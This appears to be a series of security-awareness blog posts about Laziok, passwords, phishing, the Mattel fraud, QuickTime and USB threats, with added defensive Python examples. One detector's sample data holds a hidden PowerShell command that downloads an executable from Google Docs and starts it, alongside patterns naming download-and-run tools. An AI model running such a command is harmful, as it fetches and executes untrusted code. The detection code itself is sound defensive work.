FireEye, a network security firm based in Milpitas, California, recently issued a report detailing how malevolent hackers are using Google Docs and PowerShell to transmit a Trojan virus referred to as “Laziok”. Anyone who owns or manages a business should be aware of this Trojan attack. Those who use personal computers at home for non-business purposes are vulnerable to the attack as well.

About the Laziok Trojan Attack

The Laziok Trojan was first identified a year ago when it was employed in a multi-tiered attack against energy companies across the Middle East. The virus was actually pinpointed on a Polish hosting service website used by those energy businesses. Laziok is best described as a combination of a program that steals information and a reconnaissance tool. The malware was deployed through a threat group’s exploitation of an antiquated Windows weakness tracked as “CVE-2012-0158”. Exploiting this vulnerability installs the Trojan directly onto users’ computers.

Google Docs and Laziok

The FireEye report indicates that hackers apparently devised a highly creative method of bypassing Google’s stringent security checks. The hackers then uploaded the Laziok Trojan to Google Docs. The malware was originally uploaded last March and remained in place until FireEye made Google aware of its presence. Google regularly scans and blocks potentially harmful content on Google Docs to prevent such malware from harming its customers’ computing devices. Until Laziok hit, it was widely assumed that Google Docs users would not be able to download malicious files from the popular file sharing and editing service. It is clear that the malware found a way to slide in past Google’s extensive security scans. Thankfully, the malicious file has been successfully removed by Google so that users can no longer fetch it.
How the Laziok Trojan Attack Occurs

The attack was launched by uploading highly complicated JavaScript code to take advantage of the aforementioned Windows vulnerability that is now being referred to as “Unicorn”. A VBScript was used to exploit the vulnerability when users requested the particular page in question through the popular web browser Internet Explorer. Attackers relied on a means of exploitation referred to as “Godmode” that permits code written in VBScript to compromise the web browser’s sandbox.

The script then proceeds to leverage Microsoft Windows’ PowerShell, a management framework that automates and configures computing tasks. PowerShell has been regularly abused by cyber thieves, especially throughout the past couple of years. PowerShell is used to download the Laziok Trojan from Google Docs and promptly execute it. This management framework is also favored by hackers because it can quickly and easily evade anti-virus software by injecting payloads right into memory. After infecting a computing device, Laziok proceeds to gather extensive information about the system, including all of its antivirus programs.
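The chain described above (a browser exploit starts PowerShell, which downloads a file from Google Docs and runs it) leaves traces in process-creation logs. The following Python sketch is an added example, not code from FireEye or from the original article; the event fields, the host list, the indicator names and the sample events are all constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumptions for this sketch: which hosts count as Google Docs download
# sources, and which parent processes count as a web browser.
WATCHED_HOSTS = {"docs.google.com", "drive.google.com"}
BROWSER_PARENTS = {"iexplore.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

DOWNLOAD_RE = re.compile(
    r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|start-bitstransfer",
    re.IGNORECASE)
EXECUTE_RE = re.compile(r"invoke-expression|\biex\b|start-process", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return re.split(r"[\\/]", path)[-1].lower()


def indicators(event):
    """Return the indicators present in one process-creation event."""
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return []
    cmd = event["command_line"]
    found = []
    if basename(event["parent_image"]) in BROWSER_PARENTS:
        found.append("browser-parent")      # browsers should not start PowerShell
    if DOWNLOAD_RE.search(cmd):
        found.append("download")
    hosts = {urlparse(url).hostname for url in URL_RE.findall(cmd)}
    if hosts & WATCHED_HOSTS:
        found.append("google-docs-url")
    if EXECUTE_RE.search(cmd):
        found.append("execute")
    return found


def severity(found):
    """Map a list of indicators to 'high', 'medium' or None."""
    found = set(found)
    if {"download", "execute"} <= found and found & {"browser-parent", "google-docs-url"}:
        return "high"
    if "browser-parent" in found or {"download", "google-docs-url"} <= found:
        return "medium"
    return None


def triage(events):
    """Return (event id, severity, indicators) for every event worth review."""
    results = []
    for event in events:
        found = indicators(event)
        level = severity(found)
        if level:
            results.append((event["id"], level, found))
    return results


# Constructed sample events (not taken from any real incident).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": IE, "image": PS,
     "command_line": r"powershell.exe -NoProfile -WindowStyle Hidden -Command "
                     r"(New-Object Net.WebClient).DownloadFile("
                     r"'https://docs.google.com/uc?export=download&id=EXAMPLE_ID',"
                     r"'C:\Users\Public\a.exe'); Start-Process 'C:\Users\Public\a.exe'"},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": "powershell.exe -Command Invoke-WebRequest "
                     "https://docs.google.com/spreadsheets/d/EXAMPLE_ID/export?format=csv "
                     "-OutFile report.csv"},
    {"id": 4, "parent_image": IE, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
    {"id": 5, "parent_image": IE, "image": PS,
     "command_line": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for event_id, level, found in triage(SAMPLE_EVENTS):
        print(event_id, level, ",".join(found))
```

Event 3 shows why the Google Docs host alone is only a medium signal: an ordinary script exporting a spreadsheet matches it too, so the rule needs the execution step or the browser parent before it rates an event high.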
In the world of cyber security, no topic is more important (or more derided) than that of passwords. Passwords are everywhere. They help personal users log into their online banking information, give system administrators in a business access to mission-critical file servers and more. Passwords as a concept are inherently secure; they’re the first line of defense between the user and an attacker who wants to do harm. The thing that makes passwords such a hot-button topic, however, ultimately rests with the users themselves. Simply having a password is not enough to keep anything safe in the digital age. Having a strong, complicated password is – but for many users, even in the world of business, this is often a lot easier said than done.

The Problem with Passwords

A number of studies are done on an annual basis which take a deeper look into the password-creation habits of users all over the world. One trend is overwhelmingly clear: users prefer simple, almost generic passwords above any other kind. Two of the most commonly used passwords are “12345” and “password” which, while they are technically passwords, pose a number of challenges that cannot be ignored.

First, something like “12345” is incredibly easy to guess. You don’t even have to be a “hacker” in the strictest sense of the term to guess that password; you just have to try it out and get lucky. Another issue presented when a person uses a weak password is that it IS possible for sophisticated computer software to “guess” these terms or phrases during a brute force attack, unlocking the associated account in a startlingly short amount of time.

When a user employs the password “12345” for their favorite movie-related website, that’s one thing. When a business user has the password “12345” on an online account holding important client financial information, you can begin to get an idea of just how serious this issue really is.
Not All Passwords Are Created Equally

One of the most important ways to remain safe in today’s online environment is through the creation of STRONG passwords that are a combination of not only numbers and letters, but also special symbols. “Aardvark1” may seem hard to guess to a human, but a computer can do it in a couple of minutes. “A@rdvark1!”, on the other hand, complicates things greatly and makes the password more difficult to crack.

For the best results, a password shouldn’t actually be a word at all. The strongest passwords are not only long (many experts recommend a minimum of 12 characters), but are also completely incomprehensible. Something like “a2398urasdf&#()$+” would take years for even a powerful computer to come remotely close to guessing.

The problem, however, is remembering dozens of complex passwords. Password managers were created for this exact purpose, as not only do they give users the ability to automatically generate strong passwords, but they then keep a record of all these passwords in a secure database so that users can refer to them in seconds when logging in online.
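The password advice above (at least 12 characters, letters plus numbers plus symbols, and not a word at all) can be turned into a check and run against the article's own sample passwords. This Python sketch is an added example and not part of the original article; the word lists and the look-alike substitution map are small constructed assumptions, and undoing substitutions before the dictionary test goes slightly beyond what the text spells out.

```python
import math
import string

MIN_LENGTH = 12  # the minimum the article says many experts recommend

# Constructed mini-lists for the demo; a real check would use large
# breached-password and dictionary lists.
COMMON_PASSWORDS = {"12345", "password"}
DICTIONARY = {"aardvark", "password", "dragon", "monkey", "sunshine"}

# Assumed map of look-alike substitutions to undo before the dictionary test.
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "l", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})


def character_pool(password):
    """Size of the alphabet a naive brute-force search would have to cover."""
    pool = 0
    if any(c in string.ascii_lowercase for c in password):
        pool += 26
    if any(c in string.ascii_uppercase for c in password):
        pool += 26
    if any(c in string.digits for c in password):
        pool += 10
    if any(c in string.punctuation for c in password):
        pool += len(string.punctuation)
    return pool


def brute_force_bits(password):
    """Bits of search space if every character were chosen at random."""
    pool = character_pool(password)
    return len(password) * math.log2(pool) if pool else 0.0


def dictionary_word(password):
    """Return the dictionary word hiding in the password, or None."""
    normalized = password.lower().translate(LEET)
    for word in sorted(DICTIONARY):
        if word in normalized:
            return word
    return None


def check(password):
    """List every rule from the article that the password breaks."""
    problems = []
    if password.lower() in COMMON_PASSWORDS:
        problems.append("common")
    if len(password) < MIN_LENGTH:
        problems.append("too-short")
    if not any(c.isalpha() for c in password):
        problems.append("no-letters")
    if not any(c.isdigit() for c in password):
        problems.append("no-digits")
    if not any(c in string.punctuation for c in password):
        problems.append("no-symbols")
    if dictionary_word(password):
        problems.append("dictionary-word")
    return problems


# The sample passwords quoted in the article.
SAMPLES = ["12345", "password", "Aardvark1", "A@rdvark1!", "a2398urasdf&#()$+"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r}: {brute_force_bits(sample):.1f} bits, "
              f"problems: {check(sample) or 'none'}")
```

The naive bit count rates “A@rdvark1!” highly because it assumes random characters; the dictionary test shows the base word is still there, which is why the article's advice to avoid words altogether matters.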
Emails masquerading as notifications from financial institutions are an ongoing challenge for consumers. While variations of this type of fraud attempt pop up all of the time, these “phishing” emails have become a regular occurrence.

Remember that criminals are behind phishing emails. Their intention is to get at your personal information, which they may use to commit financial fraud or identity theft.

If you are unsure if an email request is legitimate or not, take a few moments to verify the request before you give out information or click on a link. Just ensure that you verify the request using another source, not a source that is provided within the email itself. Remain wary of unsolicited email and always be cautious in your online activity. Those simple steps can help protect you from falling victim to a scam.

Your best defense against these email scams remains knowing how to recognize them:

1. Phishing emails do not only begin with a generic greeting such as “Dear Client”. They can also address you directly by name or email address.
2. Beware of emails requiring your “immediate action” in order to prevent a service from being shut down unless you log on “now” or enter your personal, financial or credit card information. These are classic phishing email techniques and should always be viewed skeptically.
3. Be suspicious of all unsolicited emails that request personal information, even if you recognize the name of the sender. Though that email may contain your name and other information that applies to you, it may still be a scam.
4. Don’t be fooled by emails that offer “too good to be true” enticements.
5. Email scams regularly take advantage of timing and promote fraudsters’ phony websites:
   a. when tragic incidents occur, fake charity sites pop up;
   b. when “juicy” stories make the news, websites promising the latest pictures or information quickly surface;
   c. for sporting events, phony websites offer amazing deals on seating;
   d. on occasions such as tax season, emails try to scare you into entering personal information on a fake website;
   e. for annual holidays, fraudsters’ websites promise “unheard of” shopping deals.

The goal of all of these scams is to get you to click on a link or access the fraudsters’ website. The result could be an automatic attempt to secretly load malicious code onto your computer. Or the email or website could contain convincing tactics to get you to enter your credit card or other personal information that could be used to commit financial fraud against you.

Charles J. Hammett Jr.
President – CEO
Hammett Technologies, LLC
Office: 877-659-4399 x1201 | Fax: 443-408-6333
To say that cybercrime is an issue in today’s modern environment is something of a dramatic understatement. According to research conducted by the Ponemon Institute, the average cost of just a single breach eclipsed $3.8 million in 2015. This breaks down to roughly $154 per compromised record, on average. With this in mind, it should come as a surprise to absolutely nobody that the Australian government has just announced a plan to spend $230 million to execute a new cybercrime strategy in that country. While the fact that they’re spending so much money isn’t necessarily noteworthy, exactly what they plan to do and how they plan to do it is something that businesses all over the world will want to pay attention to.

What Spawned These Actions?

If you had to make a list of all the countries that are being massively impacted by cybercrime, Australia would undoubtedly be right at the top. After experiencing an increased number of attacks including ransomware, DDoS (denial of service), cyberespionage and more, the cybercrime problem in the country has grown so great that it costs Australian citizens an estimated $1 billion each year.

That $1 billion figure only takes into consideration “on-the-surface” costs of dealing with such an attack. When you consider all the factors that are difficult to put a price on, the real impact is estimated to be as high as $17 billion annually – or roughly 1 percent of the country’s entire gross domestic product. The major reason why Australia is launching this new initiative is to attempt to reduce that number as much as possible.

What is Australia Doing?

The $230 million Australia is planning to spend takes the form of a five-part “plan of action” that will be executed over the next four years.
The lion’s share of that money will go towards investment, both in terms of cybersecurity innovation in the country itself and to the creation of global partnerships with countries like the United States in an effort to shut down the various resources criminals use to thrive online.

According to a report issued by The Guardian, the Australian government is expected to hire in excess of 100 new cybersecurity experts across all of its agencies in the short term. An additional $20.4 million of that money will also be going to Australia’s federal police, with an additional $16 million investment headed to the crime commission to help strengthen both its threat detection and its analytical and assessment capabilities.

Australia’s plan may have the best of intentions, but it is certainly not without its criticisms. Many experts are deriding the Australian government due to their overall lack of transparency on the issue. They may be willing to specify exactly what they’re going to do to combat cybercrime, but they’ve been less than forthcoming about how bad the issue in the country has really been to this point.

Many people also disagree with how such a large investment is being spent. While innovation is important, the majority of these funds seem to be attempting to solve a problem just by throwing as much money at it as possible. Many experts have also criticized the government’s plans as being reactive to past events instead of proactive to future ones, which is always considered to be one of the best ways to stay protected on a large scale in today’s modern environment. Instead of spending money to close gaps that have already been exploited, the government should be spending money to identify certain problem areas that still exist so that these types of issues can be avoided altogether as much as possible.
One of the most common types of cyber attacks that both businesses and personal users have to contend with today is called a “phishing” attack. An attacker will pose as a legitimate company or other business contact in an attempt to steal valuable information from their victim. For example, they may send a seemingly legitimate e-mail asking for key information including passwords, financial data and more. If the victim falls for this scam (or gets “phished”), they’ve potentially exposed themselves and (in the case of businesses) their customers to harm.

If you think that all phishing attacks are easy to spot if you know what you’re looking for, think again: toy giant Mattel recently lost $3 million after their own CEO became the sudden victim of a particularly sophisticated phishing attack.

Phishing and Mattel: What Happened?

On April 30, 2015, one of Mattel’s top-level executives based out of China received an e-mail that at first glance appeared unremarkable. It was a simple request to make a $3 million wire transfer to pay a new vendor based in that region. What followed was a perfect storm of failure and vulnerability, all of which left Mattel’s bank account $3 million lighter.

The phishing e-mail was impeccably timed. A new CEO had taken the company reins only during the previous month, and Barbie sales numbers, particularly in areas like China, were hitting lows they hadn’t seen in years. Against this background, the executive who received the e-mail was incredibly eager to please her new leader and followed Mattel’s protocol for wire transfers to the letter. Any transfer of this size required no less than two approvals, both of which she received in the coming days.

Only hours later, after speaking directly to the new CEO, who confirmed that he did not ask for any such wire transfer, did panic set in at the administrative level. Mattel immediately called not only the sending and receiving banks but also the police and the FBI.
The response they got was not what one would call “good news” – all entities confirmed that the funds were gone for good.

Luckily, however, the story did not end there. Mattel did eventually get all $3 million back with the help of local and federal law enforcement, but from a certain perspective the damage was already done. They were publicly embarrassed on a grand scale at a time when their reputation was wavering and confidence in their leadership was shaken to its core.

Even if you don’t work at Mattel, there are a number of valuable lessons to take with you from this situation. Not only is phishing becoming increasingly common by the day, but attackers are also becoming increasingly bolder – targeting a major corporate CEO directly was practically unheard of up to this point. Mattel’s public embarrassment also makes an incredibly compelling argument about the need for security awareness training for all employees, including those in HR, accounting and even the ones at the top of the proverbial food chain.
Social media continues to be a primary method of keeping in touch with friends and family — whether they live near or far. The average American does not just sit down on their couch after a long day at work and browse through their favorite site for a few minutes, though. Today, people access these sites from their mobile devices while they are on the go as well. This constant exposure to these sites means that it is more likely that you will fall victim to an innocuous-looking scam.

Sunglasses Scam

Who hasn’t seen a post by a friend on their social media page prompting them to purchase a pair of their favorite sunglasses at a steep discount? This is the result of your friend’s account being hacked, though it might not be apparent that this is the case at first. Instead, you might think that they are actually doing you a favor. After all, with the many outlet shops and overstock opportunities today, it makes perfect sense that your favorite type of sunglasses would be heavily discounted and that your friend would think of you.

How the Crooks Scam You

Once you click on the link included in the ad your friend posted, you’ll typically see an array of sunglasses from your favorite brand. Curiously, all of them will be marked down by the same percentage points. Perhaps, though, that does not seem strange to you, so you decide to purchase a few pairs at the great, heavily discounted price. Instead of going to a secure site that is protected by an industry-standard SSL certificate, so that your credit card information is encrypted, you’ll be taken to a non-secure website that offers no protection whatsoever. Your credit card information is transmitted to the scam artist in plain text and can be exploited in the future.

How to Protect Yourself

First, if it looks like it is too good to be true, then it nearly always is.
Don’t fall for heavily discounted items, and inquire on the manufacturer’s website or social media page about the validity of the ad’s claims before you complete an online transaction. If you are the person whose account is generating these ads, first change your password, then remove all apps that look suspicious. Finally, run a thorough virus scan from a trusted manufacturer on your computer.
Despite warnings from the United States Department of Homeland Security about two unpatched security holes in Apple’s QuickTime for Windows, it is estimated that at least half of all Windows computer owners will not hear about the call to delete QuickTime immediately, or will have heard but will not get around to doing it. In addition, programs such as Adobe use QuickTime for Windows codecs in its “professional video, audio and digital imaging applications and native decoding of many .mov formats is available today.”

Adobe at Risk Causes Users to Be at Risk

While Adobe has promised to fix these dependencies quickly, if you run Adobe your computer may still be at risk after you remove QuickTime for Windows from your computer. Or, Adobe may not work at all until it is patched. Given Adobe’s general laziness when it comes to vulnerabilities in its software and especially its plugins, it might be best to avoid this program until Adobe or someone else releases a security patch.

What Happened to QuickTime for Windows?

QuickTime for Windows has two known security flaws uncovered by Trend Micro, an Internet security company that owns the Zero Day Initiative (ZDI). Although once a popular video software program, the technology spans more than 20 years and is outdated.

ZDI notified Apple in late 2015 about these two flaws, but the public was not warned about the vulnerabilities until mid-April 2016, when ZDI, in accordance with its own policies, released to the public the information that there are two security vulnerabilities that the early January 2016 update did not repair.

Apple’s response was to announce it was not going to update the security flaws and was stopping support for QuickTime for Windows. For the first time in a long time, Apple and the United States found something they can agree on – if you use QuickTime for Windows, stop! – and immediately uninstall it from your machine.
However, this only applies to QuickTime for Windows; if you run QuickTime on an Apple system you are safe.

Until 2011, Apple included in downloads for iTunes for Windows the video player QuickTime for Windows, so there are tons of the software out there on Windows computers. Estimates are that at least half of users will not hear about this problem and, of those that do, half will forget to remove the software.

Any Solutions?

Every computer owner knows that to keep his or her machine operating properly you need to apply all software patches, especially security updates. Apple has discontinued support for the program, so there will be no updates. It seems that Homeland Security and Apple have the only solution possible – uninstall the program before it causes damage to you, your privacy, and confidential information.

To do an uninstall on a Windows computer is easy.

Step 1: Go to Programs and Features
Step 2: Click on QuickTime for Windows
Step 3: Click Uninstall

That’s it, your computer has eliminated this threat.

Speaking of threats, ZDI says that it’s unaware of anyone being hacked from these security failures, but the threat is real and any black hat hacker can find his or her way into a vulnerable Windows computer.

Ironically, Apple continues to offer a free download of the unsupported and vulnerable software, but if you want to play .mov files on your Windows computer, download the latest version of the Windows Media Player or software offered by sites such as VLC.
You Might Want to Think Again

With flash-based storage devices like USB thumb drives becoming more affordable with each passing day, it’s common to find one – or many – lying around offices, classrooms and more. If you’re the type of person who stores important documents on a thumb drive and then doesn’t immediately put it away for safe keeping, you may want to think again. According to a new study, many people almost instinctively plug USB flash drives that they find into the nearest computer and take a look at all the information contained inside.

The Study

The study in question was conducted by Google in association with both the University of Illinois and the University of Michigan. Researchers placed 297 different USB drives at different locations around campus, always making sure to leave these little devices sitting around at different times of the day. The results were startling: between 45%-98% of all people who found a drive eventually plugged it into a computer despite the fact that they did not own it. The shortest amount of time someone waited before plugging in a drive was just 6 minutes, meaning if you ever forget a flash drive behind in class you’d better act sooner rather than later to retrieve it.

Interestingly, researchers tried a number of different ways to see if physical characteristics made a difference when people found flash drives that they didn’t own. Some of the 297 flash drives had labels on them while others didn’t. Some were sitting by themselves, while others were attached to a set of keys. Ultimately this made no difference: if someone found a flash drive, regardless of where, what time of day it was or how it looked, they were incredibly likely to run to a computer and take a look at the contents.

So What Does This Mean?

Researchers indicated that the majority of people who found themselves unwitting participants in the study were victims of their own curiosity above all else.
All of the flash drives had identical contents – a mixture of personal and professional materials. Instead of opening a resume (which one could assume had contact information that could be used to help the owner of the drive recover his or her property), the “participants” instead chose to look at personal items like vacation photos first.

In the end, the study paints an important picture of the types of threats that are facing both personal and business users today. Everyone thinks that they must prepare for a massive hack or other cyber attack, but this study shows that less advanced and almost naively technical attacks continue to be one of the most pressing threats facing computer users today.

In terms of the business community, the study also sheds light on just how important security awareness training really is. Remember that it isn’t just the personal documents on the flash drive that could be exposed – if an employee plugs in a flash drive that they don’t own that is loaded with malicious software, they could be exposing themselves and an entire business to digital harm.
In its long-awaited Phase 2 audits, the Health and Human Services Department’s Office for Civil Rights (OCR) moved forward with ensuring compliance with federal privacy laws. The first phase, which launched in 2012, involved an OCR assessment of 115 covered entities. In March 2016, this second phase of audits was announced. During it, the procedures and policies that these entities ‒ as well as their related business associates ‒ currently have in place will be evaluated with an eye to their compliance with the requirements and regulations of the Health Insurance Portability and Accountability Act, better known as HIPAA.

A Multi-Step Process

Phase 2 will encompass several different steps. The first step involves the verification of an entity’s contact information and address. The OCR is sending out emails to those entities that are covered ‒ as well as their business associates that are also covered ‒ urging them to provide this information. It should be noted that entities that do not comply with this request could still be subjected to an audit. The OCR reminded these firms to be diligent about checking their spam folders and to update any filters that might stop emails from the agency.

Step Two of Phase 2

Step two of Phase 2 of this process will involve OCR sending covered entities a screening questionnaire that asks for more detailed information. Once this information is received, the agency expects to create audit pools that represent a broad range of covered entities, such as health plans, health care providers and other categories. From these audit pools, random entities will be chosen for the auditing process.

Two Kinds of Audits

The audits expected to be performed during Phase 2 include both on-site and desk audits. OCR issued details about the audit timelines on its website. At this writing, the agency expects to complete all desk audits by December 2016. OCR has not divulged the number of audits it aims to complete overall during Phase 2.
The information will be used by the agency to develop audit reports that are designed to improve compliance and reduce the number of breaches within the system.

Ensuring that your business is HIPAA compliant is vital to its success.
By now, most people are aware of the harm that both viruses and malware can do to your sensitive information. This is also an issue that small businesses need to be concerned about, as their financial and customer information could be compromised. A new threat, USB Thief, means that computer users might not even realize their data has been hacked because the mechanism that has done so is armed with a method of self-protection.

How USB Thief Works

As researchers have recently discovered, USB Thief relies on using a USB device to attack an air-gapped computer or an isolated server. Once it attacks, USB Thief leaves nothing behind to alert you to its presence. While other types of malware use traditional methods of spreading, such as attaching themselves to shortcuts and autorun files that then enable them to spread, USB Thief is a different animal altogether, making it a challenge to discover.

Piggybacking on USBs

Much like its name suggests, USB Thief gains entry to your system by piggybacking on portable thumb drives that contain those applications that you use the most, such as Firefox, TrueCrypt and Notepad++. It then takes up residence within the application’s command chain using a plugin or a library that is dynamically linked. The result? When the target host is running, the malware is also running quietly and unobtrusively in the background without your knowledge. It does so by utilizing six files — four that are executable and two that are loaded with configuration data.

How to Protect Yourself from USB Thief

The research firm that discovered USB Thief noted that the malware was particularly difficult to break down. This is partially due to the fact that the malware executes three payloads with the ability to steal data with each instance. USB Thief also protects itself by making a different filename with each piece of malware that it executes.
While this particular piece of malware is not widespread as of this writing, it has the potential to do a great deal of damage. It is advisable to turn off the autorun feature of any computers and to avoid using thumb drives from any unknown sources.

Malware can cause numerous problems for your small business.